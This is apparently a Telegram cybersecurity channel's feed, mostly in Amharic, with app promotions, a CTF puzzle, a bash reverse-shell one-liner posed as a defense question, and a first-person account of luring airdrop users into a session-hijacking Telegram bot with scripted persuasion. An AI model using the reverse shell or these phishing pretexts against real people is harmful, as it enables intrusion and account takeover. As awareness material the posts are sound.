CIPHER Cybersec
475 subscribers
133 photos
8 videos
21 files
103 links
⟨ CIPHΞR ⟩
Building tools, bypassing limits.
A space for developers and security enthusiasts.

❯ InfoSec | Scripts | OSINT

» Links:
https://github.com/cipher-attack
𝕏 https://x.com/Cipher_attacks
https://youtube.com/@cipher_attacks
Download Telegram
∁ ℑ ℘ Ħ ℇ ℜ ‌​‌​‌​​‌‌​‌‌​​​​‌​‌‌​‌‌​‌​‌‌‌​‌‌ ⍼
Photo
እሺ ለሁላቺሁም APP ን ላንድ ቀን እንድትጠቀሙ በነፃ ላደርግ ነው እና ይሄ ያው አይታችሁ እርግጠኛ ሁኑ በማለት ነው ለዛም ካሁኑ ሰዓት ጀምሮ እስከ ነገ ምሽት 3 ሰዓት ድረስ በነፃ መጠቀም ትችላላችሁ
መጀመሪያ
👉 @cipher_studio_bot
ዎደዚህ bot ሂዱ እና /start ካላችሁ በኃላ
⌬ Buy Access የሚለውን ንኩት
ከዛ ማንኛውንም አደጋ ላይ የማይጥል photo ዝም ብላችሁ እዛው ላይ screenshoot አድርጋችሁም ቢሆን ላኩት ከዚያ በኃላ እኔ የምጨርሰው ይሆናል


ዎይም ⛓️‍💥 @cipher_attack መጠቀም ትችላላችሁ.
🔥5
Start your crypto story with the @Binance Year in Review and share your highlights! #2025withBinance.

👉 Sign up with my link and get 100 USD rewards!
https://www.binance.com/year-in-review/2025-with-binance?ref=980127856&utm_medium=app_share_link_telegram
🫴p@thhhh
እንኳን ለ ጌታችን ለመድኃኒታችን ለ እየሱስ ክርስቶስ የ ልደት በዓል በሰላም አደረሳችሁ 🎄
​የገና በዓል ሲመጣ አብሮነትን፣ ደስታን እና አዲስ ተስፋን ይዞልን ይመጣል።
​ለመላው የክርስትና እምነት ተከታዮች በሙሉ በዓሉ የሰላም፣ የፍቅር እና የደስታ እንዲሆንላችሁ እንመኛለን። አዲሱ አመት የምታስቡት ሁሉ የሚሳካበት፣ የስራ ዘመናችሁ ፍሬያማ የሚሆንበት ይሁን።
​መልካም በዓል 🎄🎄🎄
7
ይሄ ትልቅ ዎንጀል ነው ‼️ነው
ኢትዮጵያ ውስጥ በጣም ዎደ ኋላ እየቀረን ነው በ እውነት
በተለይ hacking መማር እፈልጋለሁ ብላችሁ ባንዴ telegram ላይ እና ሌላ ትልልቅ industry ላይ የምትገቡ ሰዎች መጀመሪያ እንዴት እራሴን ልጠብቅ ይሁን ጥያቄአችሁ እኔ ይሄን የምለቅላችሁ እንድትጠነቀቁ ነው:: ማንም ሰው የፈለገውን ያህል ቢቀርባችሁ አምናችሁ ምንም አታድርጉ መጀመሪያ ስለ ላከላችሁ ምንነቱ አጣሩ የራሳችሁን research አድርጉ ከዛ ነው መጠቀም


script kiders በተለዩ የመጠቃት እድላቸው ከጀማሪዎች ከ noob ይበልጥ ጥንቃቄ የሚያስፈልጋቸው.

ምክንያቱም noob ብዙ ነገሮችን ለመንካት ይፈራል::


አንድ ነገር ከመጠቀማችሁ በፊት please ተገቢ ነው የምትሉትን ጥያቄ በሙሉ ጠይቁ አሰራሩን ተረዱት ከዛ ተጠቀሙት.


𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
👏7
It is not possible to send a link to this group
Forwarded from Yotor security channel
who want my new CTF event 😍😍😍


gn enet ayachhut ke 10 rate adrgut host adrgewalew ende enante tsebay ysetachhuwal ena ngerugn ke 10 ena demo course lastemr slasebku beziya hasab stugn mn endmtasbu mrtyas

ena rate gd new reaction e pls comment sdbm yhun byas aytachhut new yetesadebachhut beki new le ene😄 ayasasbm melkam lelit

#yotor #CTF #challeng @yotorsecurity
🙏6
ብዙዎቻችሁ የተናደዳችሁበት የ max respose length problem እስከማታ solve አድርጌ እልክላቹአለሁ በፊት limit ያደረኩት ምንም አይነት database ስለሌለው በ ራሳችሁ ሥልክ or desktop ram ላይ ስለነበር prompt history የሚያስቀምጠው ለዛ ነበር ለናንተ ሥልክ እንዳይዝግ በሚል ግን ዝገቱ ይሻለናል ያላችሁ ብዙ ናችሁ so browser የምትጠቀመሙ almost አሁንም ተስተካክሏል ለስልክ app ተጠቃሚዎች ግን እስከማታ ጠብቁ


access የሌላችሁ ደግሞ ያኛው bot ስለማይሰራ በዛ በኩል ምንም አይደርሰኝም በዚህ ተጠቀሙ

⌬⌬⌬@cipher_studios_bot⌬⌬⌬

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
👍5
እንዴት ነው አጠቃቀሙ? steps)
​ለአጠቃቀም በጣም ቀላል የሆኑ 3 እርምጃዎችን ብቻ ተከተሉ፦
​1 መጀመሪያ ወደ @cipher_studios_bot ይሂዱና Start የሚለውን ይጫኑ።
ይመዝገቡ፦ ከሚመጡት አማራጮች ውስጥ Buy Access የሚለውን በመምረጥ የኢሜይል አድራሻዎን በትክክል አስገቡ።
​2 የከፈሉበትን ደረሰኝ ፎቶ (Screenshot) ለቦቱ ላኩ። ክፍያዎ ሲረጋገጥ የኢሜይል አድራሻ እና ቁልፍ (Key) ልክ እንደዚህ ELITE-** ይላክልዎታል።
3 በመጨረሻም App-ኡን በመጫን የተላከልዎትን Key በማስገባት መጠቀም መጀመር ነው
​ለተጨማሪ ጥያቄ በ @cipher_attack ያናግሩን።
ተደጋጋሚ ጥያቄዎች (FAQ)
1. ኢሜይል ሳስገባ የደህንነት ስጋት ቢኖርብኝስ?
የእርስዎን ግላዊነት ለመጠበቅ ሲባል መተግበሪያው ምንም አይነት የGoogle Login አይጠይቅም። ማንኛውንም በ @gmail.com የሚጨርስ የፈለጉትን የኢሜይል አድራሻ (ለምሳሌ፡ test.me@gmail.com) በመጠቀም በነጻነት መግባት ይችላሉ።
2. መረጃዎቼ ወደ ሰርቨር ይላካሉ?
በፍጹም መተግበሪያው የተሰራው Local Storage በመጠቀም ነው። ከAI ጋር የሚያደርጉት ንግግር (Prompts and Responses) በሙሉ የሚቀመጠው በራስዎ ስልክ ላይ ብቻ ነው። የእኛ ዳታቤዝ (Database) የሚያገለግለው ለምዝገባ እና ለKey ማረጋገጫ ብቻ ሲሆን ከገቡ በኋላ የእርስዎን እንቅስቃሴ አይከታተልም።
3. ስለ ስልኬ ደህንነት (Malware) እንዴት እርግጠኛ እሆናለሁ?
ፈቃድ (Permissions)፦ መተግበሪያው ከፎቶ (Photo Prompt) ውጭ ምንም አይነት አላስፈላጊ የስልክ ፈቃድ አይጠይቅም።
ፍተሻ፦ ለበለጠ መተማመን በGoogle Play Protect ወይም በማንኛውም Antivirus ስካን ማድረግ ይችላሉ።
​JOIN https://t.me/cipher_attacks
SHAEE https://t.me/cipher_attacks
👍6
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

እንደ አንድ የሲስተም አስተዳዳሪ(admin) እንደዚህ አይነት Reverse Connection እንዳይፈጠር እንዴት መከላከል ይቻላል?




#CyberSecurity #Hacking_Tutorials #EthicalHacking #Linux #Networking
👍5
CIPHER Cybersec
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 እንደ አንድ የሲስተም አስተዳዳሪ(admin) እንደዚህ አይነት Reverse Connection እንዳይፈጠር እንዴት መከላከል ይቻላል? ​#CyberSecurity #Hacking_Tutorials #EthicalHacking #Linux #Networking
​እንደ ሲስተም አስተዳዳሪ (System Admin) ይህንን ለመከላከልና ለመቆጣጠር የሚከተሉትን የመከላከያ እርምጃዎች መውሰድ ይችላል
​• Firewall- ቁጥጥር
​ይህ ዋነኛው መከላከያ ነው.
Bash -አጠቃቀምን መገደብ
attacker የጥቃት ኮዱን የጫነው Standard User ስም ከሆነ ያ user /dev/tcp የመጠቀም permmison እንዳይኖረው ማድረግ ይቻላል.
•የ network ክትትል (Monitoring & Logging)
-Intrusion Detection Systems
-SIEM
•Least Privilege
Apache ወይም Nginx ያሉ በራሳቸው ዝቅተኛ permission ባለው ተጠቃሚ እንዲሰሩ ማድረግ

እና ሌሎችም መንገዶች አሉ በ ዋናነት ግን ይሄን መጥቀስ እንችላለን


channel ን join በ ማለት እና share በ ማድረግ ትብብራችሁን አሳዩን የተለያዩ cyber እና tech ነክ ጉዳዮችን በዝርዝር የምንዳሥሥ ይሆናል.
👍6
hacking ላይ ብዙዎቻችሁ እንዴት ነው social enginnering ከ ሌሎች የሚበልጠው እንዴትስ ነው የሚጠለፈው? ብላችሁ ታስባላችሁ። ግን ጥቃቱ የሚጀምረው ከኮምፒውተር ሳይሆን ከሰው ጭንቅላት ነው።
​በቅርቡ በሰራሁት Test ያረጋገጥኩት ነገር ቢኖር፦ ሰው "ነፃ(free)" ነገር እና "Official" የሚል ቃል ካየ አእምሮው መስራት ዎይም መጠራጠር ያቆማል። ለምሳሌ በነፃ Telegram Premium እና Airdrop ስም የተላከለትን link ከፍቶ የሚላክለትን ኮድ ሳያነብ የሚሰጥ ሰው ሞልቷል።
​የሚያሳዝነው ደግሞ ኮዱን የሰጡት ሰዎች Hack እየተደረጉ መሆኑን እንኳ አያውቁም ትንሽ እውቀቱ ያላቸው ደግሞ እንደተደረጉ ይገባቸዋል ግን ከዚያ በኃላ እራሱ ይሄማ ለዚህ ነው ሲባሉ ያምናሉ ። ይሄ የቴክኒክ ችግር ሳይሆን የ Social Engineering ውጤት ነው ያንድን ሰው telegram እንዲሁ በ script ዎይም በሌላ ክፍተት ተጠቅሞ hack እናድርግ ቢባል telegram ን መመርመር እና ቀዳዳ መፈልግ ግድ ይሆን ነበር ግን social engineering ላይ የ ሰውየው ክፍተት ብቻ በቂ ነው እሱን መምራት መቻል ብቻ ።
​ዝርዝር ዘዴውን እና መከላከያውን በሚቀጥለው በትንሹም ቢሆን አሳያችኋለሁ እስከዛው share አድርጉ


𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
👍72
👍6
ባለፈው ስለ Social Engineering ጥቃት ምንነት እና ለምን ከቴክኒክ ጥቃት የበለጠ አደገኛ እንደሆነ በተወሰነ መልኩ አይተናል
ሰው እንዴት በተለያዩ ቃላት በቀላሉ እንደሚታለልም አስረድቼ ነበር ዛሬ ደግሞ ባለፈው እንዳልኩት እንዴት ነው ሰዎችን በዚህ ዘዴ የምናጠቃው ? የሚለውን እንይ

•ጥቃቱ እንዴት ይፈጸማል

1.ዋናው የሰውን ልጅ ስነልቦና መጠቀም ነው ለምሳሌ እና በ ዋነኝነት Phishing Links (አሳሳች link) መላክ ነው።

እንዴት

እሺ ከፋፍዬ በምሳሌ ላስረዳችሁ:-

1. ሰዎች የሚፈልጉትን ቃላት ለምሣሌ ነፃ ስጦታዎች ወይም ቅናሾች በማቅረብ ለምሳሌ ባለፈው እንዳልኩት ነፃ ቴሌግራም ፕሪሚየም ኤርድሮፕ, ይሄን ያህል ሽልማት አሸንፈዋል በማለት link መላክ እነዚህ link ደግሞ ከታመኑ ቦታዎች ወይም ከ እራሳቸው ጉአደኛ አካውንት የተላከ በ ማስመሰል እኔ ለምሳሌ የሞከርኩት airdrop የሚሰሩ ሰዎች ላይ ነው ቀላል ነበር
1.የሆነ bot ከፈትኩ session ለመጥለፍ የሚያገለግል ስሙን unlimited premium gift አልኩት.
2.የመጣልኝ airdrop የሚሰሩ ሰውች ናቸው ለምን ካላችሁኝ ምክንያቱም እነሱ ይበልጥ የሳቡኝ ብዙ ምክንያት ነበረኝ ከሱ ውስጥ አንዱ ሁሉም ሰው በነሱ invitation code የሚገባላቸው ሰው ፍላጎቱ ነበር
3.ሁሉንም የላኩላቸው 👉"ሰላም የሆነ airdrop ግቡልኝ ስትል ነበር ግን ይከፍላል?" ነበር ምክንያቱም እኔ ያዎጣሁአቸው ከ group ላይ ምናምን link bio ላይ ምናምን ሲሉ የነበሩ ሰዎችን ነበር.

🤔ግን አስቡት አጀማመሬ "እ ሰላም bro እስኪ የሆነ airdrop start በይልኝ(በልልኝ)" ምናምን ቢሆን ምን ሊሉኝ እንደሚችሉ probability አብዛኛው ጭራሽ ሁለት ራይት እራሱ አያስበራም ነበር እንዳነበበው ላለማስነቃት ግን ለራሱ ጥቅም ለዛውም በመጠራጠር አይነት ስሜት ውስጥ ሆኘ ስጠይቀው አስቡት
3.የነሱም ምላሽ የጠበቁት ነበር በብዛት ማለት ነው ከ አንዳንድ ሰዎች በቀር ሁሉም ያሰብኩትን ነው የመለሱልኝ እናም ቀጠል አድርጌ "እሺ ግን እኔም የሆነ airdrop እየሰራሁ ነበር ይክፈል አይክፈል አላውቅም ግን እስኪ ለማንኛውም ትንሽ ሰው ነው የቀረኝ ልሞክረው ብዬ ነው start በልልኝ ቀላል ነው 1 ደቂቃ አይፈጅም ደግሞ offical ነው አልኩ ደግሞ 3 million user አለው" አልኳቸው bot ላይ ገብተው ቢያዩ እንኳን monthly user ማየት እንዳይቻል አድርጌው ስለነበር ማንም እሱን የሚያጣራ የለም በሚለው እዚህ ጋር በጅምላ ስላቸው,አልኳቸው. የምለው አብዛኛውን እንደዚሁ ስላልኳቸው ነው ካንዳንዱ በቀር.
እዚህ ጋር ደግም ልብ ማለት ያለባችሁ የሰውየውን or የሴትየዋን ምክንያት አስቀድሞ መዝጋት እና ቀላልነቱን ማሳየት በተጨማሪ ደግሞ ማሳመን ነበር.
በመጨረሻ መልሳቸው እሺ ነበር ጭራሽ ሁለት account ልግባልህ ለኔም በሌላ account ግባልኝ ያለኝ ነበር 😁
አብዛኛውን ሰው እራሴ እየመራሁ ሙሉውን session ላይ እራሱ ገብተው terminate እንዳያደርጉ ሁላ ማሳመን ችዬ ነበር ምን ያህል ክፍተት እንዳለ ልብ በሉ እና ሌሎች የቀሩ አሉ እሱን ደግሞ በቀጣይ..


ይሄን እየነገርኳችሁ ያልሁት የማያውቁ ሰዎችን እንዴት በቀላሉ ሊታለሉ ይችላሉ እና እንዴትስ ነው የሚያውቁት የሚለውን ለማስገንዘብ ነው ለሌላ ለጥፋት እንድትጠቀሙት አይደለም for
educational purpose only

በቀጣይ ደግሞ በዚሁ ዙሪያ የቀሩንን ማጥቂያ እና መከላከያ ዘዴዎች እናዎራለን
እስከዛው 👍🙏 አድርጉባት 🫡


𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
🙏8
TIP🎯

what is the main difference b/n

rm -rf file_name

and

shred -u file_name
👍4
CTF Question:°
የጠፈር ጣቢያችን Space Station ከማይታወቅ ምንጭ የተላከ አዲስ መልዕክት አግኝቷል። መልዕክቱ በሙሉ ቁጥር Numbers ነው።

የእኛ Crypto Analysts እንደሚሉት ከሆነ ይህ መልዕክት በ ASCII (American Standard Code for Information Interchange) የተጻፈ ነው።

ኮምፒውተሮች ፊደልን አያውቁም ለምሳሌ A ማለት ለኮምፒውተር 65 ነው። 97 ደግሞ small a ነው ።


Objective: ከዚህ በታች የተሰጠውን የቁጥር ዝርዝር List ወደ ፊደል ቀይራችሁ የተደበቀውን መልዕክት አግኙ።

INTERCEPTED DATA: [67, 73, 80, 72, 69, 82, 45, 67, 84, 70, 123, 119, 101, 108, 99, 111, 109, 101, 95, 116, 111, 95, 116, 104, 101, 95, 109, 97, 116, 114, 105, 120, 125]

•65-90 ===> (A to Z)
•97-122 ===> (a to z)
•48-57 ===> (0 to 9)
🔥41
👍4
CIPHER Cybersec
Photo
ሰላም ቤተሰቦች ያው ፈተና ስለነበርኩ ምንም አይነት post ማድረግ አቁሜ ነበር inbox ም በጣም ብዙ ሰው cipher studio app እየሰራልኝ አይደለም ለምትሉ በመጀመሪያ ባለመናገሬ ይቅርታ እየጠየኩ

የጠፋው አንድ ሰው ጋር ዎይም ሁለት ሰው ጋር አይደለም ጠቅላላ በሚባል ደረጃ እየሰራ አይደለም በተለይ logout ብዬ ነዉ ያላችሁ ጋር እና ይሄን በማስተካከል ላይ እንገኛለን ያጠፋነዉም ትልቅ update ላይ ስለሆንን ነዉ በቅርቡ የሚመለስ እና እዚሁ channel ላይ ለ ሁላችሁም የሚለቀቅ ይሆናል እስከዛው ግን እንደምንም ታገሱ.


ስለ update ትንሽ ልበላችሁ :-

•መጀመሪያው እና ትልቁ ለውጥ ይሄ ነዉ እስከዛሬ የነበረው app በ typeacript የተፃፈ እና በ github workflow ዎደ app የተቀየረ ነበር እና በዛ ምክንያት ለ አንዳንድ ሥልክ እያስቸገረ ነበር እና አሁን ዎደ Kotlin ተቀይሯል
•ከዚህ በፊት ምስሉ ላይ ያሉት 6 lab ቢኖሩም አይሰራም እያላችሁ ነበር እኔንም ስትጠይቁኝ ነበር እና አሁን መልሱን እና አሁን የተደረገውን ለውጥ አያይዥ ልንገራችሁ
•የማይሰራበት ምክንያት ==> የምትጠቀሙት api ከ ai studio የዎሰዳችሁት free ነዉ ለነዚህ lab ደግሞ የተጠቀምነዉ model = gemini_PRO ነበር ያ ማለት ግዴታ የተከፈለበት(paid) api ያስፈልጋችሁ ነበር አሁን ግን
•የተደረገው ለውጥ ==> ሙሉ ላይ model ን ዎደ model = gemini_FLASH, በመቀየር ነፃ እና ፈጣን አድርገነዋል

•ከዛኛው አንፃር ፈጣን እና Smooth ነዉ!
• +ADD
=> Temprature
=>Max Length
=>Quick PreSets
=>Intellegence MODEL
╭── ~/CODE-LAB
╰─❯pop up code VIEW
╰─❯split screen view
╰─❯code view
╰─❯suggestion & undo & copy code
╰─❯phone/Tab/pc View
╭── ~/VIson-HUB
╰─❯Describe image
╰─❯OCR text
╰─❯Code ext.
╰─❯Security
╭── ~/PROMPT STUDIO
╰─❯more power full prompt type & Copy & Use butoon
╰─❯Suggestions
••••••ይቀጥላል
👍9🔥1
CIPHER Cybersec
ሰላም ቤተሰቦች ያው ፈተና ስለነበርኩ ምንም አይነት post ማድረግ አቁሜ ነበር inbox ም በጣም ብዙ ሰው cipher studio app እየሰራልኝ አይደለም ለምትሉ በመጀመሪያ ባለመናገሬ ይቅርታ እየጠየኩ የጠፋው አንድ ሰው ጋር ዎይም ሁለት ሰው ጋር አይደለም ጠቅላላ በሚባል ደረጃ እየሰራ አይደለም በተለይ logout ብዬ ነዉ ያላችሁ ጋር እና ይሄን በማስተካከል ላይ እንገኛለን ያጠፋነዉም ትልቅ update…
•••የቀጠለ
╭── ~/CYBER-HOUSE
╰─❯Ai ops
╰─Payload pattern
╰─Audit
╰─Logs analysis
╰─❯UTILS
╰─B64enc and dec
╰─URL enc and dec
╰─HEX dump
╭── ~/DATA analysis
╰─❯DATA source Visualization
╰─you paste csv,json or describe data
ex:- Q1 sales,50k,Q2,75k and other

° - ° and visualize the app

╭── ~/DOC-INTEL
╰─❯paste text drag and upload file
╰─Summerize🫧
╰─Audit Risks🧾
╰─Insights 📍
╰─contract⚖️
╰─TONE😃

•max out put length ኡን
MaXimum = 32000 አድርገነዋለን ያ ማለት ለ ትልልቅ project ባንድ ጊዜ እራሱ በጣም ከፍተኛ ነዉ

•illusion ንን ሙሉ ለሙሉ በሚባል ደረጃ ተዎግዱአል

•ላሁን የመጣልኝ ይሄ ነዉ ሌሎችም ብዙ ነገሮችን ጨምረናል እና ትንሽ ሳምንት በኃላ የምንጨርስ ይሆናል


⚠️ማስጠንቀቂያ ዎደፊት ለ app መክፈል የምትፈልጉ በ security ምክንያት private የመሆን እና ዋጋው የመጨመር እድሉ በጣም ከፍተኛ ነዉ
ለበለጠ መረጃ በዚህ አዉሩኝ

CONTACT FOR ME

እንግዲህ ዎገንታት እነዚህን ሁሉ ይዞ የሚመለስ ይሆናል እስከዛው
𝗝𝗢𝗜𝗡 => 𝗖𝗜𝗣𝗛𝗘𝗥 𝗔𝗟𝗟 𝗜𝗡 𝗢𝗡𝗘
𝗦𝗛𝗔𝗥𝗘 => 𝗖𝗜𝗣𝗛𝗘𝗥 𝗖𝗢𝗠𝗠𝗨𝗡𝗜𝗧𝗬
𝗥𝗘𝗔𝗖𝗧𝗜𝗢𝗡=> 👍
እያደረጋችሁ
🔥4👍2